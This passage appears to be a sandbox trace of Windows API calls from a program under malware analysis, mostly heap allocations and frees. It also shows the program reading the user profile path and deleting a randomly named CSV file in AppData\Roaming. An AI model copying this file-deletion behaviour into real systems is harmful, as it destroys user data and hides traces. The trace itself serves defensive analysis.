returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.553] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0206.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.558] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0206.559] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.559] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0206.560] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qtQYu5s9c3vFJHOzQ.csv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv", lpFilePart=0x8bedfc*="qtQYu5s9c3vFJHOzQ.csv") returned 0x43 [0206.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.561] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qtqyu5s9c3vfjhozq.csv")) returned 0x2020 [0206.561] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d1a4a40, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0xc07d4420, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0xc07d4420, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x7e14, dwReserved0=0xdfe, dwReserved1=0x4, cFileName="qtQYu5s9c3vFJHOzQ.csv", cAlternateFileName="QTQYU5~1.CSV")) returned 0xaa5760 [0206.561] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qtqyu5s9c3vfjhozq.csv")) returned 1 [0206.562] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d1a4a40, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0xc07d4420, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0xc07d4420, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x7e14, dwReserved0=0xdfe, dwReserved1=0x4, cFileName="qtQYu5s9c3vFJHOzQ.csv", cAlternateFileName="QTQYU5~1.CSV")) returned 0 [0206.563] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.563] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0206.564] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0206.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qtQYu5s9c3vFJHOzQ.csv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 